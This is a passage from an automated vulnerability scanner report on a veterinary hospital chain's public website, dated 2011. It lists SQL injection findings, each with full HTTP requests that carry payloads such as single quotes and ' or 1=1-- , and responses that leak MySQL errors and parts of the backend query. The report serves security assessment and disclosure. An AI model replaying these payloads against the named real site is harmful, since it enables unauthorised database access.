                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

1.6. http://www.vcahospitals.com/main/img/sema-landing.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/img/sema-landing.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/img/sema-landing.jpg HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:11:54 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

1.7. http://www.vcahospitals.com/main/offer [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 48012625'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main48012625'%20or%201%3d1--%20/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:19:19 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ahpca9ejckksr3056ippblins3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2261
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...
ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main48012625'%20or%201%3d1--%20'                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20'                        
                        limit 1' at line 31

1.8. http://www.vcahospitals.com/main/offer [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /main'/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:05:10 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hq8rnqfmmvda2haj49mg0si302; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

Request 2

GET /main''/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:05:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ohksbkggjsps1t5j8gv02nt5p1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 16281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.9. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /main'/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

Request 2

GET /main''/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:17:35 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 16306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.10. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 21204365'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main21204365'%20or%201%3d1--%20/offer/?=3&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:19:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=o6doohfgvipr3saul15roodh63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2261
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...
ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main21204365'%20or%201%3d1--%20'                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20'                        
                        limit 1' at line 31

1.11. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /main'/offer/thank-you.html? HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 429

fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=h
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:22:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

1.12. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /main'/offer/thank-you.html? HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 448

fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:25:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

Request 2

POST /main''/offer/thank-you.html? HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 448

fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:25:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 8205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.13. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /manhattan-veterinary-group/appt.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /manhattan-veterinary-group'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2282
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...
oin ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='manhattan-veterinary-group''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''manhattan-veterinary-group''                        
                        limit 1' at line 31

Request 2

GET /manhattan-veterinary-group''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:46:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.14. http://www.vcahospitals.com/marshfield [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /marshfield

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /marshfield' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.15.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2250
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='marshfield''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''marshfield''                        
                        limit 1' at line 31

Request 2

GET /marshfield'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.15.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:08 GMT
